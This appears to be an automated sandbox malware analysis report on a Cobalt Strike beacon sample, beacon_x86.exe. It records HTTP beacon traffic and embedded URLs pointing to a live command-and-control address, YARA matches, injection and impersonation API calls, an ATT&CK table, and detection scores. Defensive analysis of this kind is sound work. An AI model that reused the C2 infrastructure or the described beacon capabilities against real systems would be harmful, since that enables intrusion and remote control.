        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmp, beacon_x86.exe, 00000000.00000002.3890371046.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get.
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get1
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get2
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get4
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getBase
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getF
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getK
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getL
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getP
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getoft
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getwshqos.dll.mui
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/gety

        System Summary

        barindex
        Source: 00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6C3DF GetCurrentProcess,NtProtectVirtualMemory,VirtualProtect,VirtualProtectEx,0_2_00D6C3DF
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6C320 GetCurrentProcess,NtAllocateVirtualMemory,VirtualAlloc,VirtualAllocEx,0_2_00D6C320
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6C669 GetCurrentProcess,NtCreateThreadEx,CreateThread,CreateRemoteThread,0_2_00D6C669
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D63A7E CreateProcessAsUserA,CreateProcessA,GetLastError,0_2_00D63A7E
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D840D10_2_00D840D1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D848FD0_2_00D848FD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D838280_2_00D83828
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D749E90_2_00D749E9
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D871900_2_00D87190
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D869450_2_00D86945
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D86BC00_2_00D86BC0
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D863200_2_00D86320
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D844DD0_2_00D844DD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D83CFD0_2_00D83CFD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D79DDB0_2_00D79DDB
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_03E000000_2_03E00000
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: String function: 00D7A3A4 appears 39 times
        Source: beacon_x86.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: 00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: classification engineClassification label: mal92.troj.winEXE@1/0@0/1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D631CB LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00D631CB
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D694E3 _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,0_2_00D694E3
        Source: beacon_x86.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\beacon_x86.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: beacon_x86.exeVirustotal: Detection: 79%
        Source: beacon_x86.exeReversingLabs: Detection: 94%
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D611D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00D611D8
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D212D8 push esp; retf 0_3_00D212F1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D214CD push esp; ret 0_3_00D214D5
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D239F6 push esp; retf 0_3_00D239FD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D20366 push cs; ret 0_3_00D20372
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D2423F push esi; ret 0_3_00D24248
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D76ABC push edi; ret 0_2_00D76ABD
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D7A3E9 push ecx; ret 0_2_00D7A3FC
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D775D0 push eax; ret 0_2_00D775D7
        Source: C:\Users\user\Desktop\beacon_x86.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-21391
        Source: C:\Users\user\Desktop\beacon_x86.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21163
        Source: C:\Users\user\Desktop\beacon_x86.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-20848
        Source: C:\Users\user\Desktop\beacon_x86.exeAPI coverage: 8.7 %
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Users\user\Desktop\beacon_x86.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D64225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00D64225
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6970E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00D6970E
        Source: beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmp, beacon_x86.exe, 00000000.00000002.3890371046.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\beacon_x86.exeAPI call chain: ExitProcess graph end nodegraph_0-21023
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D7768B LdrInitializeThunk,0_2_00D7768B
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D88375 IsDebuggerPresent,_RTC_GetSrcLine,DebugBreak,0_2_00D88375
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D611D8 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00D611D8
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D29FDE mov eax, dword ptr fs:[00000030h]0_3_00D29FDE
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_3_00D2ACAE mov eax, dword ptr fs:[00000030h]0_3_00D2ACAE
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D681C2 DeleteProcThreadAttributeList,GetProcessHeap,HeapFree,0_2_00D681C2
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_0040116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0040116C
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00401A5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A5C
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00401A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A60
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00401160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,0_2_00401160
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_004013C1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,0_2_004013C1
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_004011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,0_2_004011A3
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D81950 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D81950
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D7F331 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D7F331
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D7B4B2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D7B4B2
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6D272 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_00D6D272
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6D442 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00D6D442
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: GetLocaleInfoA,0_2_00D84EF0
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_0040161C CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_0040161C
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_004019A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004019A0
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D66F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_00D66F09
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D66F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_00D66F09
        Source: C:\Users\user\Desktop\beacon_x86.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: beacon_x86.exe, type: SAMPLE
        Source: Yara matchFile source: 0.2.beacon_x86.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.0.beacon_x86.exe.400000.0.unpack, type: UNPACKEDPE
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D675B7 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00D675B7
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6DDB3 socket,closesocket,htons,bind,listen,0_2_00D6DDB3
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D67699 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00D67699
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts
        2
        Native API
        2
        Valid Accounts
        2
        Valid Accounts
        2
        Valid Accounts
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading
        21
        Access Token Manipulation
        21
        Access Token Manipulation
        LSASS Memory21
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media2
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Process Injection
        1
        Process Injection
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        NTDS1
        Account Discovery
        Distributed Component Object ModelInput Capture111
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information
        LSA Secrets1
        System Owner/User Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials1
        File and Directory Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync14
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        beacon_x86.exe79%VirustotalBrowse
        beacon_x86.exe95%ReversingLabsWin32.Trojan.CobaltStrike
        beacon_x86.exe100%AviraHEUR/AGEN.1344233
        beacon_x86.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://8.148.6.140/api/v1/get40%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getK0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/get20%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/get10%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getBase0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/gety0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getL0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getwshqos.dll.mui0%Avira URL Cloudsafe
